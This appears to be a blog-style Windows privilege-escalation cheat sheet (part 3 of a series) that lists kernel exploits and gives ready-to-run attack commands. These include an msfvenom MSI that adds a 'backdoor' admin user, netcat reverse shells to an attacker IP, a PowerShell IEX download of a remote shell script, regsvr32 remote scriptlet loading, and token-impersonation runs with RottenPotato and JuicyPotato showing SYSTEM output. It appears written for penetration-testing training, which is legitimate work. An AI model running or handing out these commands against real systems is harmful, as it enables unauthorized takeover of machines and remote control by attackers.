Windows privilege escalation – part 3 | Kernal-Exploits

windwos
Windows-Pentesting

EoP – Kernel Exploitation

List of exploits kernel : https://github.com/SecWiki/windows-kernel-exploits

#Security Bulletin   #KB     #Description    #Operating System
  • MS17-017  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8)
  • CVE-2017-8464  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
  • CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
  • CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
  • CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
  • MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
  • MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
  • MS16-111  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1)
  • MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)
  • MS16-075  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
  • MS16-034  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012)
  • MS16-032  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
  • MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)
  • MS16-014  [K3134228]  [remote code execution]  (2008/Vista/7)
  • MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)

To cross-compile a program from Kali, use the following command.

Kali> i686-mingw32msvc-gcc -o adduser.exe useradd.c
Kali> X86_64-w64- mingw32msvc-gcc -o adduser.exe useradd.c 

EoP – AlwaysInstallElevated

Check if these registry values are set to “1”.

$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Then create an MSI package and install it.

$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
$ msiexec /quiet /qn /i C:\evil.msi

Technique also available in Metasploit : exploit/windows/local/always_install_elevated

EoP – Insecure GUI apps

Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.

Example: “Windows Help and Support” (Windows + F1), search for “command prompt”, click on “Click to open Command Prompt”

EoP – Runas

Use the cmdkey to list the stored credentials on the machine.

cmdkey /list
Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator

Then you can use runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Using runas with a provided set of credential.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$ computer = "<hostname>"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

EoP – From local administrator to NT SYSTEM

PsExec.exe -i -s cmd.exe

EoP – Living Off The Land Binaries and Scripts

Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/

The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.

A LOLBin/Lib/Script must:

  • Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. Have extra “unexpected” functionality. It is not interesting to document intended use cases. Exceptions are application whitelisting bypasses
  • Have functionality that would be useful to an APT or red team
wmic.exe process call create calc
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Microsoft.Workflow.Compiler.exe tests.xml results.xml

EoP – Impersonation Privileges

Meterpreter getsystem and alternatives

meterpreter> getsystem 
Tokenvator.exe getsystem cmd.exe 
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
psexec -s -i cmd.exe 
python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc

RottenPotato (Token Impersonation)

Binary available at : https://github.com/foxglovesec/RottenPotato Binary available at : https://github.com/breenmachine/RottenPotatoNG

getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"

Juicy Potato (abusing the golden privileges)

Binary available at : https://github.com/ohpe/juicy-potato/releases
⚠️ Juicy Potato doesn’t work in Windows Server 2019.

  1. Check the privileges of the service account, you should look for SeImpersonate and/or SeAssignPrimaryToken (Impersonate a client after authentication)whoami /priv
  2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object
  3. Execute JuicyPotato to run a privileged command.JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a “IP PORT -e cmd.exe” -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a “/c c:\users\User\reverse_shell.exe” Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 …… [+] authresult 0 {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK

Leave a Reply

Your email address will not be published. Required fields are marked *